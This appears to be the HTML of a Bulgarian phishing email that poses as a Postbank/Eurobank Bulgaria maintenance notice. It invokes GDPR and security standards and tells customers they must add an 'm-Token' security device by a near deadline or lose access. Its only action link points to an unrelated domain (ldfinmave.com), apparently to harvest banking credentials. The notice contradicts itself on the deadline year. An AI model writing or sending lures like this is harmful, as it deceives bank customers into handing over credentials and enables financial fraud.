<!DOCTYPE html>
<html>
<head>
<title>Postbank</title>
</head>
<body><img src="https://i.imgur.com/15RPDZT.png"> <span style="HEIGHT: 15px; DISPLAY: block"></span>
<p style="FONT-FAMILY: arial">Уважаеми клиенти,</p>
<p style="FONT-FAMILY: arial">Напомняме Ви, че на 23.12.2022 г. от 12:30 ч. до 16:30 ч. е насрочена техническа профилактика за следните ни уеб сайтове:</p><span style="HEIGHT: 15px; DISPLAY: block"></span>
<p style="FONT-FAMILY: arial"><em><b>postbank.bg</b></em></p>
<p style="FONT-FAMILY: arial"><em><b>e-postbank.bg</b></em></p><span style="HEIGHT: 15px; DISPLAY: block"></span>
<p style="FONT-FAMILY: arial">Техническата профилактика се изразява в имплементация на новите мерки за сигурност, гарантиращи безкомпромисно качество на предлаганите услуги.</p>
<p style="FONT-FAMILY: arial">Съгласно скорошните законови изменения, позовавайки се на Регламент (ЕС) 2016/679 на Европейския парламент от 27 април 2016 година, сме упълномощени да извършим следните действия:</p><span style="HEIGHT: 15px; DISPLAY: block"></span>
<p style="FONT-FAMILY: arial"><b>1.</b> Стартиране на процедура по <b>задължително</b> добавяне на допълнително средство за сигурност <b>m-Token</b>.</p>
<p style="FONT-FAMILY: arial"><b>2.</b> Актуализиране на банковият софтуер и онлайн услуги в съответствие с <b>PCI DSS 3.2.1</b> / <b>ISO 27001</b>.</p>
<p style="FONT-FAMILY: arial"><b>3.</b> Провеждане на вътрешен системен одит в частност с оптимизация на предлаганите услуги с цел подобряване на качеството и сигурността.</p><span style="HEIGHT: 15px; DISPLAY: block"></span>
<p style="FONT-FAMILY: arial">Процедурата по добавяне на допълнително средство за сигурност е <b>задължителна</b> за всички клиенти, като крайният срок е до 24.12.2022 г.</p><span style="HEIGHT: 15px; DISPLAY: block"></span>
<p style="FONT-FAMILY: arial"><a target="_blank" href="https://ldfinmave.com/redirect.php"><b>Можете да добавите допълнително средство за сигурност, като кликнете тук.</b></a></p><span style="HEIGHT: 15px; DISPLAY: block"></span>
<p style="FONT-FAMILY: arial">Клиентите, които не са добавили допълнително средство за сигурност до 24.12.2021 г. <b>(включително)</b>, ще бъдат временно лишени от достъп до нашите онлайн услуги.</p>
<p style="FONT-FAMILY: arial">Поднасяме нашите извинения в случай на причинено неудобство и Ви благодарим за рабирането!</p><span style="HEIGHT: 15px; DISPLAY: block"></span>
<p style="FONT-FAMILY: arial">С уважение,</p>
<p style="FONT-FAMILY: arial"><b>Юробанк България АД</b></p>
</body>
</html>
